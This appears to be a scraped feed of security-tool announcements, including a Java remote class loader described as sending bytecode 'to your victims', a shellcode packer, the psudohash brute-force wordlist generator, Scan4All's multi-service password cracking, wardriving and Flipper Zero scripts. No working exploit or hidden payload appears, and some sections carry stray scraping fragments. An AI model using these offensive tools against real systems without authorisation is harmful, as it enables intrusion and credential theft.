Today, with the spread of information technology systems, investments in the field of cyber security have increased to a great extent. Vulnerability management, penetration tests and various analyzes are carried out to accurately determine how much our institutions can be affected by cyber threats. With Tenable Nessus, the industry leader in vulnerability management tools, an IP address that has just joined the corporate network, a newly opened port, exploitable vulnerabilities can be determined, and a python application that can work integrated with Tenable Nessus has been developed to automatically identify these processes.


Features

  • Finding New IP Address
  • Finding New Port
  • Finding New Exploitable Vulnerability

Installation

git clone https://github.com/anil-yelken/Nessus-Automation cd Nessus-Automation sudo pip3 install requirements.txt

Usage

The SIEM IP address in the codes should be changed.

In order to detect a new IP address exactly, it was checked whether the phrase "Host Discovery" was used in the Nessus scan name, and the live IP addresses were recorded in the database with a timestamp, and the difference IP address was sent to SIEM. The contents of the hosts table were as follows:

Usage: python finding-new-ip-nessus.py

By checking the port scans made by Nessus, the port-IP-time stamp information is recorded in the database, it detects a newly opened service over the database and transmits the data to SIEM in the form of "New Port:" port-IP-time stamp. The result observed by SIEM is as follows:

Usage: python finding-new-port-nessus.py

In the findings of vulnerability scans made in institutions and organizations, primarily exploitable vulnerabilities should be closed. At the same time, it records the vulnerabilities in the database that can be exploited with metasploit in the institutions and transmits this information to SIEM when it finds a different exploitable vulnerability on the systems. Exploitable vulnerabilities observed by SIEM:

Usage: python finding-exploitable-service-nessus.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Java-Remote-Class-Loader - Tool to send Java bytecode to your victims to load and execute using Java ClassLoader together with Reflect API


This tool allows you to send Java bytecode in the form of class files to your clients (or potential targets) to load and execute using Java ClassLoader together with Reflect API. The client receives the class file from the server and return the respective execution output. Payloads must be written in Java and compiled before starting the server.


Features

  • Client-server architecture
  • Remote loading of Java class files
  • In-transit encryption using ChaCha20 cipher
  • Settings defined via args
  • Keepalive mechanism to re-establish communication if server restarts

Installation

Tool has been tested using OpenJDK 11 with JRE Java Package, both on Windows and Linux (zip portable version). Java version should be 11 or higher due to dependencies.

https://www.openlogic.com/openjdk-downloads

Usage

$ java -jar java-class-loader.jar -help

usage: Main
-address <arg> address to connect (client) / to bind (server)
-classfile <arg> filename of bytecode .class file to load remotely
(default: Payload.class)
-classmethod <arg> name of method to invoke (default: exec)
-classname <arg> name of class (default: Payload)
-client run as client
-help print this message
-keepalive keeps the client getting classfile from server every
X seconds (default: 3 seconds)
-key <arg> secret key - 256 bits in base64 format (if not
specified it will generate a new one)
-port <arg> port to connect (client) / to bind (server)
-server run as server

Example

Assuming you have the following Hello World payload in the Payload.java file:

//Payload.java
public class Payload {
public static String exec() {
String output = "";
try {
output = "Hello world from client!";
} catch (Exception e) {
e.printStackTrace();
}
return output;
}
}

Then you should compile and produce the respective Payload.class file.

To run the server process listening on port 1337 on all net interfaces:

$ java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class

Running as server
Server running on 0.0.0.0:1337
Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

On the client side, you may use the same JAR package with the -client flag and use the symmetric key generated by server. Specify the server IP address and port to connect to. You may also change the class name and class method (defaults are Payload and String exec() respectively). Additionally, you can specify -keepalive to keep the client requesting class file from server while maintaining the connection.

$ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

Running as client
Connecting to 192.168.1.73:1337
Received 593 bytes from server
Output from invoked class method: Hello world from client!
Sent 24 bytes to server

References

Refer to https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/ for a blog post related with the development of this tool.

  1. https://github.com/rebeyond/Behinder

  2. https://github.com/AntSwordProject/antSword

  3. https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/

  4. https://www.sangfor.com/blog/cybersecurity/behinder-v30-analysis

  5. https://xz.aliyun.com/t/2799

  6. https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7

  7. https://venishjoe.net/post/dynamically-load-compiled-java-class/

  8. https://users.cs.jmu.edu/bernstdh/web/common/lectures/slides_class-loaders_remote.php

  9. https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/

  10. https://openjdk.org/jeps/329

  11. https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html

  12. https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/reflect/Method.html



OpenSSH 9.1p1

This is a Linux/portable port of OpenBSD's excellent OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen's SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, and many other clean-ups.

Bayanay - Python Wardriving Tool


WarDriving is the act of navigating, on foot or by car, to discover wireless networks in the surrounding area.

Features

Wardriving is done by combining the SSID information obtained with scapy using the HTML5 geolocation feature.


Usage

I cannot be held responsible for the malicious use of the vehicle.

ssidBul.py has been tested via TP-LINK TL WN722N.

Selenium 3.11.0 and Firefox 59.0.2 are used for location.py. Firefox geckodriver is located in the directory where the codes are.

SSID and MAC names and location information were created and changed in the test environment.

ssidBul.py and location.py must be run concurrently.

ssidBul.py result:

20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Here is a screenshot of allowing location information while running location.py:

The screenshot of the location information is as follows:

konum.py result:

lat=38.8333635|lon=34.759741899|20 March 2018 11:47PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

After the data collection processes, the following output is obtained as a result of running wardriving.py:

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Deadfinder - Find Dead-Links (Broken Links)


Dead link (broken link) means a link within a web page that cannot be connected. These links can have a negative impact to SEO and Security. This tool makes it easy to identify and modify.


Installation

Install with Gem

gem install deadfinder

Docker Image

docker pull ghcr.io/hahwul/deadfinder:latest

Usage

Commands:
deadfinder file # Scan the URLs from File. (e.g deadfinder file urls.txt)
deadfinder help [COMMAND] # Describe available commands or one specific command
deadfinder pipe # Scan the URLs from STDIN. (e.g cat urls.txt | deadfinder pipe)
deadfinder sitemap # Scan the URLs from sitemap.
deadfinder url # Scan the Single URL.
deadfinder version # Show version.

Options:
c, [--concurrency=N] # Set Concurrncy
# Default: 20
t, [--timeout=N] # Set HTTP Timeout
# Default: 10
o, [--output=OUTPUT] # Save JSON Result

Modes

# Scan the URLs from STDIN (multiple URLs)
cat urls.txt | deadfinder pipe

# Scan the URLs from File. (multiple URLs)
deadfinder file urls.txt

# Scan the Single URL.
deadfinder url https://www.hahwul.com

# Scan the URLs from sitemap. (multiple URLs)
deadfinder sitemap https://www.hahwul.com/sitemap.xml

JSON Handling

deadfinder sitemap https://www.hahwul.com/sitemap.xml \
-o output.json

cat output.json | jq


Pmanager - Store And Retrieve Your Passwords From A Secure Offline Database. Check If Your Passwords Has Leaked Previously To Prevent Targeted Password Reuse Attacks


Demo

Description

Store and retrieve your passwords from a secure offline database. Check if your passwords has leaked previously to prevent targeted password reuse attacks.


Why develop another password manager ?

  • This project was initially born from my desire to learn Rust.
  • I was tired of using the clunky GUI of keepassxc.
  • I wanted to learn more about cryptography.
  • For fun. :)

Features

  • Secure password storage with state of the art cryptographic algorithms.
    • Multiple iterations of argon2id for key derivation to make it harder for attacker to conduct brute force attacks.
    • Aes-gcm256 for database encryption.
  • Custom encrypted key-value database which ensures data integrity.(Read the blog post I wrote about it here.)
  • Easy to install and to use. Does not require connection to an external service for its core functionality.
  • Check if your passwords are leaked before to avoid targeted password reuse attacks.
    • This works by hashing your password with keccak-512 and sending the first 10 digits to XposedOrNot.

Installation

Pmanager depends on "pkg-config" and "libssl-dev" packages on ubuntu. Simply install them with

sudo apt install pkg-config libssl-dev -y

Download the binary file according to your current OS from releases, and add the binary location to PATH environment variable and you are good to go.

Building from source

Ubuntu & WSL

sudo apt update -y && sudo apt install curl
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
sudo apt install build-essential -y
sudo apt install pkg-config libssl-dev git -y
git clone https://github.com/yukselberkay/pmanager
cd pmanager
make install

Windows

git clone https://github.com/yukselberkay/pmanager
cd pmanager
cargo build --release

Mac

I have not been able to test pmanager on a Mac system. But you should be able to build it from the source ("cargo build --release"). since there are no OS specific functionality.

Documentation

Firstly the database needs to be initialized using "init" command.

Init

# Initializes the database in the home directory.
pmanager init --db-path ~

Insert

# Insert a new user and password pair to the database.
pmanager insert --domain github.com

Get

# Get a specific record by domain.
pmanager get --domain github.com

List

# List every record in the database.
pmanager list

Update

# Update a record by domain.
pmanager update --domain github.com

Delete

# Deletes a record associated with domain from the database.
pmanager delete github.com

Leaked

# Check if a password in your database is leaked before.
pmanager leaked --domain github.com
pmanager 1.0.0

USAGE:
pmanager [OPTIONS] [SUBCOMMAND]

OPTIONS:
-d, --debug
-h, --help Print help information
-V, --version Print version information

SUBCOMMANDS:
delete Delete a key value pair from database
get Get value by domain from database
help Print this message or the help of the given subcommand(s)
init Initialize pmanager
insert Insert a user password pair associated with a domain to database
leaked Check if a password associated with your domain is leaked. This option uses
xposedornot api. This check achieved by hashing specified domain's password and
sending the first 10 hexade cimal characters to xposedornot service
list Lists every record in the database
update Update a record from database

Roadmap

  • Unit tests
  • Automatic copying to clipboard and cleaning it.
  • Secure channel to share passwords in a network.
  • Browser extension which integrates with offline database.

Support

Bitcoin Address -> bc1qrmcmgasuz78d0g09rllh9upurnjwzpn07vmmyj



TestSSL 3.0.8

testssl.sh is a free command line tool which checks a server's service on any port for the support of TLS/SSL ciphers, protocols as well as recent cryptographic flaws, and much more. It is written in (pure) bash, makes only use of standard Unix utilities, openssl and last but not least bash sockets.

SIPPTS 3.2

Sippts is a set of tools to audit VoIP servers and devices using SIP protocol. It is programmed in Python script and it allows us to check the security of a VoIP server using SIP protocol, over UDP, TCP and TLS protocols.

monomorph MD5-Monomorphic Shellcode Packer

This tool packs up to 4KB of compressed shellcode into an executable binary, near-instantly. The output file will always have the same MD5 hash: 3cebbe60d91ce760409bbe513593e401. Currently, only Linux x86-64 is supported. It would be trivial to port this technique to other platforms, although each version would end up with a different MD5.

SpyCast - A Crossplatform mDNS Enumeration Tool


SpyCast is a crossplatform mDNS enumeration tool that can work either in active mode by recursively querying services, or in passive mode by only listening to multicast packets.


Building

cargo build --release

OS specific bundle packages (for example dmg and app bundles on OSX) can be built via:

cargo tauri build

SpyCast can also be built without the default UI, in which case all output will be printed on the terminal:

cargo build --no-default-features --release

Running

Run SpyCast in active mode (it will recursively query all available mDNS services):

./target/release/spycast

Run in passive mode (it won't produce any mDNS traffic and only listen for multicast packets):

./target/release/spycast --passive

Other options

Run spycast --help for the complete list of options.

License

This project is made with โ™ฅ by @evilsocket and it is released under the GPL3 license.


Psudohash - Password List Generator That Focuses On Keywords Mutated By Commonly Used Password Creation Patterns


psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.


Pentesting Corporate Environments

System administrators and other employees often use a mutated version of the Company's name to set passwords (e.g. Am@z0n_2022). This is commonly the case for network devices (Wi-Fi access points, switches, routers, etc), application or even domain accounts. With the most basic options, psudohash can generate a wordlist with all possible mutations of one or multiple keywords, based on common character substitution patterns (customizable), case variations, strings commonly used as padding and more. Take a look at the following example:

ย 

The script includes a basic character substitution schema. You can add/modify character substitution patterns by editing the source and following the data structure logic presented below (default):

transformations = [
{'a' : '@'},
{'b' : '8'},
{'e' : '3'},
{'g' : ['9', '6']},
{'i' : ['1', '!']},
{'o' : '0'},
{'s' : ['$', '5']},
{'t' : '7'}
]

Individuals

When it comes to people, i think we all have (more or less) set passwords using a mutation of one or more words that mean something to us e.g., our name or wife/kid/pet/band names, sticking the year we were born at the end or maybe a super secure padding like "!@#". Well, guess what?

Installation

No special requirements. Just clone the repo and make the script executable:

git clone https://github.com/t3l3machus/psudohash
cd ./psudohash
chmod +x psudohash.py

Usage

./psudohash.py [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]

The help dialog [ -h, --help ] includes usage details and examples.

Usage Tips

  1. Combining options --years and --append-numbering with a --numbering-limit โ‰ฅ last two digits of any year input, will most likely produce duplicate words because of the mutation patterns implemented by the tool.
  2. If you add custom padding values and/or modify the predefined common padding values in the source code, in combination with multiple optional parameters, there is a small chance of duplicate words occurring. psudohash includes word filtering controls but for speed's sake, those are limited.

Future

I'm gathering information regarding commonly used password creation patterns to enhance the tool's capabilities.



Suricata IDPE 6.0.8

Suricata is a network intrusion detection and prevention engine developed by the Open Information Security Foundation and its supporting vendors. The engine is multi-threaded and has native IPv6 support. It's capable of loading existing Snort rules and signatures and supports the Barnyard and Barnyard2 tools.

nfstream 6.5.2

nfstream is a Python package providing fast, flexible, and expressive data structures designed to make working with online or offline network data both easy and intuitive. It aims to be the fundamental high-level building block for doing practical, real world network data analysis in Python. Additionally, it has the broader goal of becoming a common network data processing framework for researchers providing data reproducibility across experiments.

Scan4All - Vuls Scan: 15000+PoCs; 21 Kinds Of Application Password Crack; 7000+Web Fingerprints; 146 Protocols And 90000+ Rules Port Scanning; Fuzz, HW, Awesome BugBounty...


  • What is scan4all: integrated vscan, nuclei, ksubdomain, subfinder, etc., fully automated and intelligentใ€‚red team tools Code-level optimization, parameter optimization, and individual modules, such as vscan filefuzz, have been rewritten for these integrated projects. In principle, do not repeat the wheel, unless there are bugs, problems
  • Cross-platform: based on golang implementation, lightweight, highly customizable, open source, supports Linux, windows, mac os, etc.
  • Support [21] password blasting, support custom dictionary, open by "priorityNmap": true
    • RDP
    • SSH
    • rsh-spx
    • Mysql
    • MsSql
    • Oracle
    • Postgresql
    • Redis
    • FTP
    • Mongodb
    • SMB, also detect MS17-010 (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148), SmbGhost (CVE- 2020-0796)
    • Telnet
    • Snmp
    • Wap-wsp (Elasticsearch)
    • RouterOs
    • HTTP BasicAuth
    • Weblogic, enable nuclei through enableNuclei=true at the same time, support T3, IIOP and other detection
    • Tomcat
    • Jboss
    • Winrm(wsman)
    • POP3
  • By default, http password intelligent blasting is enabled, and it will be automatically activated when an HTTP password is required, without manual intervention
  • Detect whether there is nmap in the system, and enable nmap for fast scanning through priorityNmap=true, which is enabled by default, and the optimized nmap parameters are faster than masscan Disadvantages of using nmap: Is the network bad, because the traffic network packet is too large, which may lead to incomplete results Using nmap additionally requires setting the root password to an environment variable

  export PPSSWWDD=yourRootPswd 

More references: config/doNmapScan.sh By default, naabu is used to complete port scanning -stats=true to view the scanning progress Can I not scan ports?

noScan=true ./scan4all -l list.txt -v
# nmap result default noScan=true
./scan4all -l nmapRssuilt.xml -v
  • Fast 15000+ POC detection capabilities, PoCs include:
    • nuclei POC

    Nuclei Templates Top 10 statistics

TAG COUNT AUTHOR COUNT DIRECTORY COUNT SEVERITY COUNT TYPE COUNT
cve 1294 daffainfo 605 cves 1277 info 1352 http 3554
panel 591 dhiyaneshdk 503 exposed-panels 600 high 938 file 76
lfi 486 pikpikcu 321 vulnerabilities 493 medium 766 network 50
xss 439 pdteam 269 technologies 266 critical 436 dns 17
wordpress 401 geeknik 187 exposures 254 low 211
exposure 355 dwisiswant0 169 misconfiguration 207 unknown 7
cve2021 322 0x_akoko 154 token-spray 206
rce 313 princechaddha 147 workflows 187
wp-plugin 297 pussycat0x 128 default-logins 101
tech 282 gy741 126 file 76

281 directories, 3922 files.

  • vscan POC
    • vscan POC includes: xray 2.0 300+ POC, go POC, etc.
  • scan4all POC
  • Support 7000+ web fingerprint scanning, identification:

    • httpx fingerprint
      • vscan fingerprint
      • vscan fingerprint: including eHoleFinger, localFinger, etc.
    • scan4all fingerprint
  • Support 146 protocols and 90000+ rule port scanning

    • Depends on protocols and fingerprints supported by nmap
  • Fast HTTP sensitive file detection, can customize dictionary

  • Landing page detection

  • Supports multiple types of input - STDIN/HOST/IP/CIDR/URL/TXT

  • Supports multiple output types - JSON/TXT/CSV/STDOUT

  • Highly integratable: Configurable unified storage of results to Elasticsearch [strongly recommended]

  • Smart SSL Analysis:

    • In-depth analysis, automatically correlate the scanning of domain names in SSL information, such as *.xxx.com, and complete subdomain traversal according to the configuration, and the result will automatically add the target to the scanning list
    • Support to enable *.xx.com subdomain traversal function in smart SSL information, export EnableSubfinder=true, or adjust in the configuration file
  • Automatically identify the case of multiple IPs associated with a domain (DNS), and automatically scan the associated multiple IPs

  • Smart processing:

      1. When the IPs of multiple domain names in the list are the same, merge port scans to improve efficiency
      1. Intelligently handle http abnormal pages, and fingerprint calculation and learning
  • Automated supply chain identification, analysis and scanning

  • Link python3 log4j-scan

    • This version blocks the bug that your target information is passed to the DNS Log Server to avoid exposing vulnerabilities
    • Added the ability to send results to Elasticsearch for batch, touch typing
    • There will be time in the future to implement the golang version how to use?
mkdir ~/MyWork/;cd ~/MyWork/;git clone https://github.com/hktalent/log4j-scan
  • Intelligently identify honeypots and skip targets. This function is disabled by default. You can set EnableHoneyportDetection=true to enable

  • Highly customizable: allow to define your own dictionary through config/config.json configuration, or control more details, including but not limited to: nuclei, httpx, naabu, etc.

  • support HTTP Request Smuggling: CL-TEใ€TE-CLใ€TE-TEใ€CL_CLใ€BaseErrย 


  • Support via parameter Cookie='PHPSession=xxxx' ./scan4all -host xxxx.com, compatible with nuclei, httpx, go-poc, x-ray POC, filefuzz, http Smuggling

work process


how to install

download from Releases

go install github.com/hktalent/scan4all@2.6.9
scan4all -h

how to use

    1. Start Elasticsearch, of course you can use the traditional way to output, results
mkdir -p logs data
docker run --restart=always --ulimit nofile=65536:65536 -p 9200:9200 -p 9300:9300 -d --name es -v $PWD/logs:/usr/share/elasticsearch/logs -v $PWD /config/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml -v $PWD/config/jvm.options:/usr/share/elasticsearch/config/jvm.options -v $PWD/data:/ usr/share/elasticsearch/data hktalent/elasticsearch:7.16.2
# Initialize the es index, the result structure of each tool is different, and it is stored separately
./config/initEs.sh

# Search syntax, more query methods, learn Elasticsearch by yourself
http://127.0.0.1:9200/nmap_index/_doc/_search?q=_id:192.168.0.111
where 92.168.0.111 is the target to query
  • Please install nmap by yourself before use Using Help
go build
# Precise scan url list UrlPrecise=true
UrlPrecise=true ./scan4all -l xx.txt
# Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
priorityNmap=false ./scan4all -tp http -list allOut.txt -v

Work Plan

  • Integrate web-cache-vulnerability-scanner to realize HTTP smuggling smuggling and cache poisoning detection
  • Linkage with metasploit-framework, on the premise that the system has been installed, cooperate with tmux, and complete the linkage with the macos environment as the best practice
  • Integrate more fuzzers , such as linking sqlmap
  • Integrate chromedp to achieve screenshots of landing pages, detection of front-end landing pages with pure js and js architecture, and corresponding crawlers (sensitive information detection, page crawling)
  • Integrate nmap-go to improve execution efficiency, dynamically parse the result stream, and integrate it into the current task waterfall
  • Integrate ksubdomain to achieve faster subdomain blasting
  • Integrate spider to find more bugs
  • Semi-automatic fingerprint learning to improve accuracy; specify fingerprint name, configure

Q & A

  • how use Cookie?
  • libpcap related question

more see: discussions

Changelog

  • 2022-07-20 fix and PR nuclei #2301 ๅนถๅ‘ๅคšๅฎžไพ‹็š„bug
  • 2022-07-20 add web cache vulnerability scanner
  • 2022-07-19 PR nuclei #2308 add dsl function: substr aes_cbc
  • 2022-07-19 ๆทปๅŠ dcom Protocol enumeration network interfaces
  • 2022-06-30 ๅตŒๅ…ฅๅผ้›†ๆˆ็งไบบ็‰ˆๆœฌnuclei-templates ๅ…ฑ3744ไธชYAML POC๏ผ› 1ใ€้›†ๆˆElasticsearchๅญ˜ๅ‚จไธญ้—ด็ป“ๆžœ 2ใ€ๅตŒๅ…ฅๆ•ดไธชconfig็›ฎๅฝ•ๅˆฐ็จ‹ๅบไธญ
  • 2022-06-27 ไผ˜ๅŒ–ๆจก็ณŠๅŒน้…๏ผŒๆ้ซ˜ๆญฃ็กฎ็Ž‡ใ€้ฒๆฃ’ๆ€ง;้›†ๆˆksubdomain่ฟ›ๅบฆ
  • 2022-06-24 ไผ˜ๅŒ–ๆŒ‡็บน็ฎ—ๆณ•๏ผ›ๅขžๅŠ ๅทฅไฝœๆต็จ‹ๅ›พ
  • 2022-06-23 ๆทปๅŠ ๅ‚ๆ•ฐParseSSl๏ผŒๆŽงๅˆถ้ป˜่ฎคไธๆทฑๅบฆๅˆ†ๆžSSLไธญ็š„DNSไฟกๆฏ๏ผŒ้ป˜่ฎคไธๅฏนSSLไธญdns่ฟ›่กŒๆ‰ซๆ๏ผ›ไผ˜ๅŒ–๏ผšnmapๆœช่‡ชๅŠจๅŠ .exe็š„bug๏ผ›ไผ˜ๅŒ–windowsไธ‹็ผ“ๅญ˜ๆ–‡ไปถๆœชไผ˜ๅŒ–ไฝ“็งฏ็š„bug
  • 2022-06-22 ้›†ๆˆ11็งๅ่ฎฎๅผฑๅฃไปคๆฃ€ๆต‹ใ€ๅฏ†็ ็ˆ†็ ด๏ผšftpใ€mongodbใ€mssqlใ€mysqlใ€oracleใ€postgresqlใ€rdpใ€redisใ€smbใ€sshใ€telnet๏ผŒๅŒๆ—ถไผ˜ๅŒ–ๆ”ฏๆŒๅค–ๆŒ‚ๅฏ†็ ๅญ—ๅ…ธ
  • 2022-06-20 ้›†ๆˆSubfinder๏ผŒๅŸŸๅ็ˆ†็ ด๏ผŒๅฏๅŠจๅ‚ๆ•ฐๅฏผๅ‡บEnableSubfinder=true๏ผŒๆณจๆ„ๅฏๅŠจๅŽๅพˆๆ…ข๏ผ› ssl่ฏไนฆไธญๅŸŸๅไฟกๆฏ็š„่‡ชๅŠจๆทฑๅบฆ้’ปๅ– ๅ…่ฎธ้€š่ฟ‡ config/config.json ้…็ฝฎๅฎšไน‰่‡ชๅทฑ็š„ๅญ—ๅ…ธ๏ผŒๆˆ–่ฎพ็ฝฎ็›ธๅ…ณๅผ€ๅ…ณ
  • 2022-06-17 ไผ˜ๅŒ–ไธ€ไธชๅŸŸๅๅคšไธชIP็š„ๆƒ…ๅ†ต๏ผŒๆ‰€ๆœ‰IP้ƒฝไผš่ขซ็ซฏๅฃๆ‰ซๆ๏ผŒ็„ถๅŽๆŒ‰็…งๅŽ็ปญ็š„ๆ‰ซๆๆต็จ‹
  • 2022-06-15 ๆญค็‰ˆๆœฌๅขžๅŠ ไบ†่ฟ‡ๅŽปๅฎžๆˆ˜ไธญ่Žทๅพ—็š„ๅ‡ ไธชweblogicๅฏ†็ ๅญ—ๅ…ธๅ’Œwebshellๅญ—ๅ…ธ
  • 2022-06-10 ๅฎŒๆˆๆ ธ็š„ๆ•ดๅˆ๏ผŒๅฝ“็„ถๅŒ…ๆ‹ฌๆ ธๆจกๆฟ็š„ๆ•ดๅˆ
  • 2022-06-07 ๆทปๅŠ ็›ธไผผๅบฆ็ฎ—ๆณ•ๆฅๆฃ€ๆต‹ 404
  • 2022-06-07 ๅขžๅŠ http urlๅˆ—่กจ็ฒพๅ‡†ๆ‰ซๆๅ‚ๆ•ฐ๏ผŒๆ นๆฎ็Žฏๅขƒๅ˜้‡UrlPrecise=trueๅผ€ๅฏ


Suricata IDPE 6.0.7

Suricata is a network intrusion detection and prevention engine developed by the Open Information Security Foundation and its supporting vendors. The engine is multi-threaded and has native IPv6 support. It's capable of loading existing Snort rules and signatures and supports the Barnyard and Barnyard2 tools.

pyFlipper - Unoffical Flipper Zero Cli Wrapper Written In Python


Unoffical Flipper Zero cli wrapper written in Python

Functions and characteristics:

  • Flipper serial CLI wrapper
  • Websocket client interface

Setup instructions:

$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt

Tested on:

  • Python 3.8.10 on Linux 5.4.0 x86_64
  • Python 3.10.5 on Android 12 (Termux + OTGSerial2WebSocket NO ROOT REQUIRED)

Usage/Examples

Connection

from pyflipper import PyFlipper

#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")

#OR

#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")

Power

#Info
info = flipper.power.info()

#Poweroff
flipper.power.off()

#Reboot
flipper.power.reboot()

#Reboot in DFU mode
flipper.power.reboot2dfu()

Update/Backup

#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")

#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")

#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")

Loader

#List installed apps
apps = flipper.loader.list()

#Open app
flipper.loader.open(app_name="Clock")

Flipper Info

bluetooth info bt_info = flipper.bt.info()">
#Get flipper date
date = flipper.date.date()

#Get flipper timestamp
timestamp = flipper.date.timestamp()

#Get the processes dict list
ps = flipper.ps.list()

#Get device info dict
device_info = flipper.device_info.info()

#Get heap info dict
heap = flipper.free.info()

#Get free_blocks string
free_blocks = flipper.free.blocks()

#Get bluetooth info
bt_info = flipper.bt.info()

Storage

Filesystem Info

#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")

Explorer

#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")

#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")

#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")

#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")

Files

generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable. The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc. """ flipper.storage.write.send(text_two) time.sleep(3) #Don't forget to stop flipper.storage.write.stop()">
#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")

#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")

#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")

#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")

#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")

#Write file in one chunk
file = "/ext/bar.txt"

text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.file(file, text)

#Write file using a listener
file = "/ext/foo.txt"

text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.start(file)

time.sleep(2)

flipper.storage.write.send(text_one)

text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)

time.sleep(3)

#Don't forget to stop
flipper.storage.write.stop()

LED/Backlight

#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)

#Set blue led off
flipper.led.blue(value=0)

#Set green led value
flipper.led.green(value=175)

#Set backlight on
flipper.led.backlight_on()

#Set backlight off
flipper.led.backlight_off()

#Turn off led
flipper.led.off()

Vibro

#Set vibro True or False
flipper.vibro.set(True)

#Set vibro on
flipper.vibro.on()

#Set vibro off
flipper.vibro.off()

GPIO

#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

#Read gpio pin value
flipper.gpio.read(pin_name=PIN_NAME)

#Set gpio pin value
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

MusicPlayer

#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"

#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)

#Stop loop
flipper.music_player.stop()

#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)

#Beep
flipper.music_player.beep()

#Beep for 5 seconds
flipper.music_player.beep(duration=5)

NFC

#Synchronous default timeout 5 seconds

#Detect NFC
nfc_detected = flipper.nfc.detect()

#Emulate NFC
flipper.nfc.emulate()

#Activate field
flipper.nfc.field()

RFID

#Synchronous default timeout 5 seconds

#Read RFID
rfid = flipper.rfid.read()

SubGhz

#Transmit hex_key N times(default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)

#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")

Infrared

#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")
